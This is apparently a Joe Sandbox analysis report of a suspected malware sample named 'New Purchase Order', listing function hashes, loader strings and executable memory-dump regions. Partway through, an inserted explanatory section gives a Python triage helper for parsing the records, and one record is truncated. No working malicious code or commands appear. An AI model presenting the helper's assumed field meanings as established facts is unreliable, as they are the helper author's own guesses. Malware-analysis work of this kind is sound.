                • Instruction ID: a5a5f1e1fb7319ddef91e9a80966de523ec1a396ed1724b22910c12a9b717455
                • Opcode Fuzzy Hash: 302543a3e277a53e6a5f9eb18125658180fb6f2035a053ed0eabaaff085bafff
                • Instruction Fuzzy Hash: 71716BB5E0020E8FEF28CF9CC9906ADBBB1BF59714F24812AE505E7241EB318A41CB50
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: .mui
                • API String ID: 0-1199573805
                • Opcode ID: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                • Instruction ID: acf943690a9f1b33d3e680a35fc07ad377f3dce6abbb1f4c96979ff44a835ddc
                • Opcode Fuzzy Hash: 174a770b20aa18d7260c6b950528379c41360755463430703efbb9045f851528
                • Instruction Fuzzy Hash: D8518472D0022A9BDB11EF99D844AAEFBB4AF18B14F054169E912FB250D774DE01CBE4
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: EXT-
                • API String ID: 0-1948896318
                • Opcode ID: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                • Instruction ID: 2789e94426bc37d7fc437fe6d1cac619bb15acb33d4b51bc4e8b7a554bad17a0
                • Opcode Fuzzy Hash: 86636defff9c950b515a103a208858f8c06973d26d73be753dbd382925247328
                • Instruction Fuzzy Hash: 364191725483129BD710DA79D848B6BFBE8AF8C714F440E6DF684D7280EA74DA04C797
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: BinaryHash
                • API String ID: 0-2202222882
                • Opcode ID: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                • Instruction ID: ad30b7e1fa78be232b1e453a0b923eed95a94964ebcb10710e6761f7f81ef199
                • Opcode Fuzzy Hash: 8e587b65f5ca8b81161858b00a6480e1b63ca7b63f9247bc04c2b59cbb114e4a
                • Instruction Fuzzy Hash: 534154B2D0112DABDB21DA54CC84FDEB77DAB44714F0045A5EB08EB141DB709F898FA5
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: #
                • API String ID: 0-1885708031
                • Opcode ID: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                • Instruction ID: 99aba85182f37b05e8dfad162e6f179fb25be84674f095ee1cda8e3cee7d0be0
                • Opcode Fuzzy Hash: b752d7cda5f6ef76f848401d3b50d72da29a19f3b588beabf9cc223914c8c687
                • Instruction Fuzzy Hash: 91312C31A00B899BDB22CB6DC854BAE7BACDF54704F244028E941EB286E775DA05CB50
                Strings
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: BinaryName
                • API String ID: 0-215506332
                • Opcode ID: e72b8000ef5afb7ba4d657c8ddf589937d3560104ac48964c26ec7faf2b7538a
                • Instruction ID: a05ea6882ab8e29fc7421ab5a8b49ea663d5d19625525d3c531f36ecf1d45869
                • Opcode Fuzzy Hash: e72b8000ef5afb7ba4d657c8ddf589937d3560104ac48964c26ec7faf2b7538a
                • Instruction Fuzzy Hash: 7531313690251EAFEB16CA48C844E6FFBB8EB80724F014029E901E7291DB309F00DBE0
                Strings
                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0185895E
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                • API String ID: 0-702105204
                • Opcode ID: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                • Instruction ID: a9e2d4175cff0da6f66ba1ba5838d05fa8c27a13f4d37a8ba2911457251098af
                • Opcode Fuzzy Hash: 0946887d35e2285565052d689c1ce29725843981864aeeca01b404783d89c6af
                • Instruction Fuzzy Hash: 6401F7313002159FEB615A5BCCC8A66BFB6EFC6754B04001EFA4296151CB30AA41CB92
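The records above are machine-generated and repetitive, so an analyst usually wants to filter them rather than read them. The following helper is an added example, not part of the Joe Sandbox report or its tooling: it parses these per-function records, decodes the memory-dump name into the Windows memory attributes its fields line up with (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE, all documented MEMORY_BASIC_INFORMATION values), rebases each string xref to an RVA inside the dump, and flags records whose strings sit in a writable-and-executable private region that carries a PE header. The positional meaning of the dump-name fields (process index, dump kind, dump id, base, protection, state, type) is an assumption inferred from those values; the sample excerpt is copied from two of the records on this page.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Documented Windows MEMORY_BASIC_INFORMATION constants.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXEC = {0x40, 0x80}

SOURCE_RE = re.compile(r"Source File:\s*(\S+),\s*Offset:\s*[0-9A-Fa-f]+,\s*based on PE:\s*(true|false)")
XREF_RE = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f]+)$")


@dataclass
class DumpSource:
    name: str
    process_idx: int
    base: int
    protect: int
    state: int
    mem_type: int
    based_on_pe: bool

    def describe(self) -> str:
        return "process %d, base 0x%X, %s, %s, %s, PE header %s" % (
            self.process_idx, self.base,
            PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect)),
            MEM_STATE.get(self.state, hex(self.state)),
            MEM_TYPE.get(self.mem_type, hex(self.mem_type)),
            "present" if self.based_on_pe else "absent")

    def is_rwx_private_pe(self) -> bool:
        # A PE living in committed, private, writable+executable memory was not loaded by the OS loader.
        return (self.protect & 0xFF) in WRITABLE_EXEC and self.mem_type == 0x20000 and self.based_on_pe


def parse_source(line: str) -> DumpSource:
    m = SOURCE_RE.search(line)
    if not m:
        raise ValueError("not a Source File line: " + line)
    name = m.group(1)
    p = name.split(".")  # ASSUMPTION: pid.kind.id.base.protect.state.type.reserved.ext
    return DumpSource(name, int(p[0], 16), int(p[3], 16), int(p[4], 16),
                      int(p[5], 16), int(p[6], 16), m.group(2) == "true")


@dataclass
class FunctionRecord:
    opcode_id: str = ""
    instruction_hash: str = ""
    api_ids: List[str] = field(default_factory=list)
    string_ids: List[str] = field(default_factory=list)
    xrefs: Dict[str, int] = field(default_factory=dict)   # string -> virtual address
    source: Optional[DumpSource] = None

    def xref_rvas(self) -> Dict[str, int]:
        base = self.source.base if self.source else 0
        return {s: va - base for s, va in self.xrefs.items()}


def parse_records(text: str) -> List[FunctionRecord]:
    """One record ends at its 'Instruction Fuzzy Hash' line; '$' separates multiple IDs."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line.startswith("Source File:"):
            cur.source = parse_source(line)
        elif line.startswith("API ID:"):
            cur.api_ids = [a for a in line[len("API ID:"):].strip().split("$") if a]
        elif line.startswith("String ID:"):
            cur.string_ids = [s for s in line[len("String ID:"):].strip().split("$") if s]
        elif line.startswith("Opcode ID:"):
            cur.opcode_id = line[len("Opcode ID:"):].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.instruction_hash = line[len("Instruction Fuzzy Hash:"):].strip()
            records.append(cur)
            cur = FunctionRecord()
        else:
            m = XREF_RE.match(line)
            if m:
                cur.xrefs[m.group(1)] = int(m.group(2), 16)
    return records


def triage(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Records with string xrefs inside an RWX private PE region: worth a manual look."""
    return [r for r in records if r.source and r.source.is_rwx_private_pe() and r.xrefs]


# Constructed excerpt: two records copied from the report above.
SAMPLE = r"""
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01854899
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01854888
• LdrpCheckRedirection, xrefs: 0185488F
Memory Dump Source
• Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• Opcode ID: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
• Instruction Fuzzy Hash: E941F236A042559FCBA1CE2DD840A26BBE4FF89B54F06066DED48D7311F731EA80CB81
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
• API ID: ___swprintf_l
• String ID: #%u
• Opcode ID: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
• Instruction Fuzzy Hash: 68714971A0014A9FDB01DFA8C994FAEB7F8FF48704F144065E905E7251EA34EE41CBA1
"""

if __name__ == "__main__":
    for rec in triage(parse_records(SAMPLE)):
        print(rec.source.describe())
        for s, rva in rec.xref_rvas().items():
            print("  +0x%06X  %s" % (rva, s))
```

Run against a whole saved report, the triage list is short even for thousands of records, and the RVAs let you jump straight to the same offsets in the extracted `.sdmp` file in a disassembler.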
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                • Instruction ID: 44838b425544c497f099bd9a67c94f28a73bbdfcd5ebf9d38e25e87cc6e782ca
                • Opcode Fuzzy Hash: cbe3cba486dbb3a58240f7149d8e837a97bd697076a9a0c93b880938eef4e978
                • Instruction Fuzzy Hash: 1F42D1326083419BE725CF68C890A6BFBE6FF88344F08092DFA96D7250D771DA45CB52
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                • Instruction ID: a22478e1edda26c3f3bcf9a641b5309ad4b88e1f7e9c0314b223be18aa35cc4d
                • Opcode Fuzzy Hash: 7d5a4fe1101f77c72211bf34ea0100645723c3d95091aceae63387458a9aaf94
                • Instruction Fuzzy Hash: 94423B75A003198FEB25CF69C881BADBBF9BF49304F148199E94DEB242D7349A85CF50
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                • Instruction ID: 18c426a66275e213be5d2db32d8bf7d3dc5e89f1a12c18d7df3083c68f190725
                • Opcode Fuzzy Hash: 1babdcd1e72be32297e569930488ffea665999489f4d77429c770aee4975a4b6
                • Instruction Fuzzy Hash: AF32AE70A00759ABDB25CF6DC8547BABBF2BF88304F28411DD586DB285E735AB41CB90
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                • Instruction ID: 788ef849efa1dc6a4509162cb7c11612ba55e2c53580c1b2debe44df2a1a0650
                • Opcode Fuzzy Hash: 86b6bd37c2718a901fdb4d67d2e85859e9a8434d5eb19af50edf3ae1b4f0f716
                • Instruction Fuzzy Hash: FD22D1742046658BEB2DCF2DC09437ABBF1AF44344F0C8499E996CF286E335D692DB61
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                • Instruction ID: e6729b6dff4ee0e91c3797236e0237a8929d18e97cb142ef03daab9ca2bb63e8
                • Opcode Fuzzy Hash: 66652aca6e9bb018d99372a1a7505eee91bec1e6d0095299a0072cea8e697e68
                • Instruction Fuzzy Hash: 87327C71A04209CFDB25CF68C484AAAFBF2FF88310F2445A9E956EB351D774E941CB91
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction ID: 1b6c63ce8975351423e54f0968f8452a1d27abcb1bb7d6c38435fd159db905be
                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                • Instruction Fuzzy Hash: 59F14B71E0021A9BDB15CFA9C584BAFFBB5AF48710F08816DEA06EB345E734D941CB90
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                • Instruction ID: fc4f33bcf9c6e68d282df1f6170dcd0773480753a8866096790eaf8f60472328
                • Opcode Fuzzy Hash: e6fab0867f2881f27b979e36ee0f55a8b235aa4b4f7faeb61eb2038d8de5e147
                • Instruction Fuzzy Hash: 2AD1E171A0070A8FDF15CF69C841AFEB7FAAF89304F188169D959E7241E735EA05CB60
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                • Instruction ID: 3e8a48bf1b088b02c3551d390db5ba8993d075bc8c19f56a2cff65ae5b38d777
                • Opcode Fuzzy Hash: e78b4f50c89325a6141449f36c18ef21d3665fa43d05bda927c8e5f3bdcf11de
                • Instruction Fuzzy Hash: 92E17A716083468FC715CF28C494A6AFBF0BF89314F15896DF99987351EB31E905CB92
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                • Instruction ID: 64401e788b030b9da4a3f2a760aa8fc9256785dcb312b704a0ae0e523d7b738c
                • Opcode Fuzzy Hash: 6edcca7d3bd33a3011686512c3b89bee270e7541db3ff95aed68c546431b5700
                • Instruction Fuzzy Hash: 64D1F271A0021A9BDB25CF68C880ABBF7F5FF54B04F04466DE916DB285EB34EA50CB51
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction ID: de6052908631eea0141d246928ef0687fd0fb4cf2de8feae7396142fbb2a9a61
                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                • Instruction Fuzzy Hash: ECB1A374A006099FDB64DF9AC940EABBFB9FF85344F10445EAE42D7791DA70EA06CB10
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction ID: 09f57b9a789d2587b36d9fb9471f040cd227f085f64cbf4be7f7cf2de1f120c9
                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                • Instruction Fuzzy Hash: 45B1F6317006469FDB15DB68C858BBEFBF6AF88300F284599E652D7285D770EE41CB90
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                • Instruction ID: 18365b1ebacd7e5dd220bc918e135984e7cc4d05faf0959af248093ec1291f3a
                • Opcode Fuzzy Hash: 36da6d339d4e427fdff6d0cc1ef1fc2143b3e18b953597a3cb9502ce78f00876
                • Instruction Fuzzy Hash: 82C167702083458FE764CF19C484BAAFBF4BF88704F54496DE98987291D774EA09CFA2
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                • Instruction ID: 86087506c86a622330d0c9febecc5f106f7a1bb021d4fc7dc52a0895c8b5b086
                • Opcode Fuzzy Hash: e14083a4fb5b7d13dad46c1656da26fd2f13244966bf91f2c064d552c40f7b0a
                • Instruction Fuzzy Hash: 4CB17F70A002668BDB25CF68D980BA9F3B5EF54700F2485EDD50EE7285EB349EC5CB21
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • Instruction Fuzzy Hash: E741B1726087469FD320DF6CC840A6AB7E9FFC8700F144A29F995D7690E730EA14C7A6
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 168cdc483016c80a790195a16b145b81e9018e58be7ddb3e13b29ad2d2bcb6ae
                • Instruction ID: 891b9b5879f2eb4c77fd799de0dc6e85b6aafab5bf1f4009c7b1f8ded1d91da2
                • Opcode Fuzzy Hash: 168cdc483016c80a790195a16b145b81e9018e58be7ddb3e13b29ad2d2bcb6ae
                • Instruction Fuzzy Hash: 0241C03060030A8FD725DF29D888B2AFBF9EF80354F14446DE6968B6A5DB70D951CB91
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4c5cee59e8f686dbd6452c6ac423d1889f3a067ca19eb3415fa3fc21fc55a000
                • Instruction ID: a1db07ec1e075925b1b5b7492cc9e9b3fa044fb2f72b9d0b8c057d2d673a1b3b
                • Opcode Fuzzy Hash: 4c5cee59e8f686dbd6452c6ac423d1889f3a067ca19eb3415fa3fc21fc55a000
                • Instruction Fuzzy Hash: 614180B1A01619DFCB25CF69C98099DFBF1FF88B20B1486AED466A7350DB34A941CB41
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                • Instruction ID: a06f0333d7c988500416755d6fd45c50931028a67f0e514cabbb98d027b52309
                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                • Instruction Fuzzy Hash: 76311831A04244AFDB229B68CC48B9BFFE9EF58350F0841A9F455DB356C6B49944CBA0
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: df43f7af7165fc88d7193d08b1307d9de8aab43f0c354b2c81fc1e46be95f156
                • Instruction ID: 8494422cdfc78f79ecf957ba63ffdd56dfebd0d6f216f222524e0d830d905c5b
                • Opcode Fuzzy Hash: df43f7af7165fc88d7193d08b1307d9de8aab43f0c354b2c81fc1e46be95f156
                • Instruction Fuzzy Hash: 9831B93574070AABD7229F698C85F6B76E8AF58B54F000068F600EB3D5DAA4DD00C7A1
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf7ee2f3b045522e9be59792375c6aad9554e14036e2c6f4129f807ef7984d38
                • Instruction ID: 86c64ba7348ad3a6b0bffa44d8fdcd59aa7e2456ce9d91986d309e840ccc02dd
                • Opcode Fuzzy Hash: bf7ee2f3b045522e9be59792375c6aad9554e14036e2c6f4129f807ef7984d38
                • Instruction Fuzzy Hash: BB319C322052028FC331EF19D984B26B7EAFF84360F1A446EE995CB755E731AA00CF91
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 94a25e3a1f35f986992365916f2e1ebdeef1efeda6561ed51801ae3b7058e0e8
                • Instruction ID: 976f87636102cef1e7aca46d3be8da44fab11dff1b10d92922ca7dd0cdc638bc
                • Opcode Fuzzy Hash: 94a25e3a1f35f986992365916f2e1ebdeef1efeda6561ed51801ae3b7058e0e8
                • Instruction Fuzzy Hash: D541AD71200B49DFD722CF28C885BA6BBE9BF89714F154429F69ACB651DB70E900CB90
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a1a864c6f8fa6c31f46ee72e00180f68383d821bed5aba480d06a6d7647c78ea
                • Instruction ID: 6111583876bb36205362105704b7f45a03c3fd370c1b2d4a0f4f1f017b05aa0f
                • Opcode Fuzzy Hash: a1a864c6f8fa6c31f46ee72e00180f68383d821bed5aba480d06a6d7647c78ea
                • Instruction Fuzzy Hash: 1C317E726043028FD320EF28C880B2AB7EAFB84710F19456DEA55DB755E730EE04CB91
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                • Instruction ID: 900454a7df90818cf412ac0a7a7f541e3d2308606188d7fe9e3739b6d95e8b80
                • Opcode Fuzzy Hash: fc46084386b5fc5a544eeb2930a7569e956f24813ddb4c9a1a745f9c63be13a3
                • Instruction Fuzzy Hash: 5831B43160168E9BF322976CCD48F15BBD8BB44748F1D04A0AE45EB6D2DF2CDA80C225
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                • Instruction ID: 0a748489578459997a992cc46169b2cef9de6705997ffccbfb6ff45224945d58
                • Opcode Fuzzy Hash: ae366bab9dc086d7d26918a0bfe1e46b9a2af73adacf5ff3a41e0f2d2985578c
                • Instruction Fuzzy Hash: 2831E476A0011AEBDB15DFD8CC44BAEB7B9FB48740F5941A9E900EB244E770EE00CB90
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                • Instruction ID: 3b751a85a5e43c1cb340db691a61765a37d73e2f6425cc4831558dbb9ffdbcf3
                • Opcode Fuzzy Hash: 6a4a01d28314d3b6b8d8da14757b791afccd9019449b2473e64d1cd7a96b4968
                • Instruction Fuzzy Hash: 31313576A4012DABCB21DF58DD48BDEBBF9AB98350F1500A5E508E7260DA30DF918F91
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_9_2_17a0000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                • Instruction ID: 1b6ca5db284dd27e0c3bafeaf171ce4d6c4b4b19e1b220fba441759f280aa182
                • Opcode Fuzzy Hash: 2ef8863c0ef8c52ba25fe9b592257c8fc565586218889f590fa7595d3c1acb75
                • Instruction Fuzzy Hash: 7231B632D00219AFDB21DEA9CC44EAFF7F9EF44750F014469E616D7260D6709E008BE1
                Memory Dump Source
                • Source File: 00000009.00000002.2391856999.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                Joe Sandbox IDA Plugin
